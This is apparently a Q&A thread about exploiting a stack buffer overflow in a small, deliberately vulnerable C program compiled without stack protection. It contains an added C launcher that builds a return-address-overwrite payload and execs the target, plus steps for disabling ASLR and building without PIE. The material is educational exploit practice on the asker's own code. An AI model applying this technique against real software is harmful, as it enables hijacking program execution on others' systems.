
How can I exploit a segfault and run a shell command?

Following this: How can I exploit a buffer overflow?

I have code compiled using -fno-stack-protector:

#include <stdio.h>

/* Target function: the goal is to redirect execution here. */
void shellcode(){
    /* No trailing '\n' and no fflush(): stdout is buffered, so if the
     * process crashes after this function returns, this text may never
     * actually be displayed even though the function was reached. */
    printf("\n Reached shellcode!");
}

int main(int argc, char **argv){
    char buf[3];                 /* 3-byte stack buffer */
    sprintf(buf, "%s", argv[1]); /* no length check: an argv[1] longer than 2 chars overflows buf */
    return 0;
}

but I am unable to execute the shellcode function.

Like in that post, I am using:

python -c 'print "A"*27+"\x49\x11\x00\x00\x00\x00\x00\x00"' > input
./a < input

I get a segfault at:

./a 12345678901
Segmentation fault (core dumped)

but nothing happens.

My main goal is to execute ls on Linux instead of the shellcode function, but right now nothing works.

There are two potential problems here:

  1. By using sprintf(.., argv[1]), you seem to be expecting input from argv. But ./a < input directs the file to STDIN.

  2. ASLR could screw your exploit up, meaning that you don't know if the address is correct.

It's very difficult to answer such questions without having the binary (a) itself, or at least the Makefile.

If I were you, I would work with a debugger (GDB is great) until the exploit works. But it's worth noting that with ASLR, it would be tough.
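The answer's two points (the payload has to arrive in argv[1], not on stdin, and the address is only meaningful if ASLR is not moving the target) can be turned into a small launcher. The program below is an added example, my own code rather than anything from the question or the answer. It assumes an x86-64 Linux target built from the question's source; the file name exploit.c, the padding value 27 and the address 0x401149 in the usage comment are placeholders, to be replaced by the distance from buf to the saved return address as measured in GDB and by the address nm reports for shellcode. It also makes one caveat visible that neither post mentions: the payload passes through sprintf("%s"), so it is a C string and is cut at its first NUL byte. Every 64-bit user-space address has leading zero bytes, so only the low bytes up to the first zero (plus the terminator sprintf itself appends) ever land on the stack. An address as small as 0x1149 is usually what objdump prints for a position-independent (PIE) binary before relocation, which means the real address changes on every run under ASLR; compiling with -no-pie alongside -fno-stack-protector gives a fixed address such as 0x401149.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Lay out "pad" filler bytes followed by the 64-bit target address in
 * little-endian order (x86-64). Returns the payload length, or 0 if "out"
 * is too small. "pad" is the distance from the start of buf to the saved
 * return address; it must be measured in a debugger, not guessed. */
size_t build_payload(uint8_t *out, size_t cap, size_t pad, uint64_t addr)
{
    if (cap < pad + 8)
        return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 8; i++)
        out[pad + i] = (uint8_t)(addr >> (8 * i));
    return pad + 8;
}

/* sprintf(buf, "%s", argv[1]) copies argv[1] only up to its first NUL byte.
 * Return how many payload bytes actually reach the stack through that path
 * (the terminating NUL that sprintf appends is not counted). */
size_t argv_survives(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return i;
    return len;
}

/* 0 = ASLR off, 1 or 2 = on, -1 = unknown (not Linux or /proc unreadable). */
int aslr_mode(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (!f)
        return -1;
    int mode = -1;
    if (fscanf(f, "%d", &mode) != 1)
        mode = -1;
    fclose(f);
    return mode;
}

/* Usage (placeholder values): ./exploit ./a 27 0x401149
 * Delivers the payload as argv[1] of the target, the path sprintf actually
 * reads, instead of redirecting a file to stdin. */
int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <target> <pad> <hex-addr>\n", argv[0]);
        return 1;
    }
    size_t pad = strtoul(argv[2], NULL, 0);
    uint64_t addr = strtoull(argv[3], NULL, 16);
    uint8_t payload[512];
    /* keep one byte spare so the payload can be NUL-terminated for execv */
    size_t len = build_payload(payload, sizeof payload - 1, pad, addr);
    if (!len) {
        fprintf(stderr, "payload too long\n");
        return 1;
    }
    payload[len] = 0;

    size_t kept = argv_survives(payload, len);
    if (kept < len)
        fprintf(stderr, "warning: only %zu of %zu bytes reach the target; "
                "the address contains NUL bytes, so only %zu of its 8 bytes "
                "are written through argv\n", kept, len, kept - pad);
    int mode = aslr_mode();
    if (mode > 0)
        fprintf(stderr, "warning: ASLR is on (randomize_va_space=%d); a PIE "
                "target's addresses change on every run\n", mode);

    char *child_argv[] = { argv[1], (char *)payload, NULL };
    execv(argv[1], child_argv);
    perror("execv");
    return 1;
}
```

Build the target with gcc -fno-stack-protector -no-pie -o a a.c, read the address with nm ./a | grep shellcode, and either disable ASLR system-wide (echo 0 > /proc/sys/kernel/randomize_va_space as root) or run the launcher under setarch -R so the measured addresses hold. The warnings the launcher prints are the two checks to do before blaming the offset: if most of the address is lost to the NUL cut, or ASLR is still on, no padding value will make the return land in shellcode.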
